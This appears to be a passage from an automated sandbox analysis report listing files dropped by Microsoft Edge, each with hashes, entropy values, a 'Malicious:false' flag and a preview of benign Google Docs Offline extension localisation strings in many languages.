Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):994
Entropy (8bit):4.700308832360794
Encrypted:false
SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:A568A58817375590007D1B8ABCAEBF82
SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:false
Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2091
Entropy (8bit):4.358252286391144
Encrypted:false
SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:4717EFE4651F94EFF6ACB6653E868D1A
SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:false
Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2778
Entropy (8bit):3.595196082412897
Encrypted:false
SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:false
Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1719
Entropy (8bit):4.287702203591075
Encrypted:false
SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:3B98C4ED8874A160C3789FEAD5553CFA
SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:false
Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):936
Entropy (8bit):4.457879437756106
Encrypted:false
SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:7D273824B1E22426C033FF5D8D7162B7
SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:false
Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
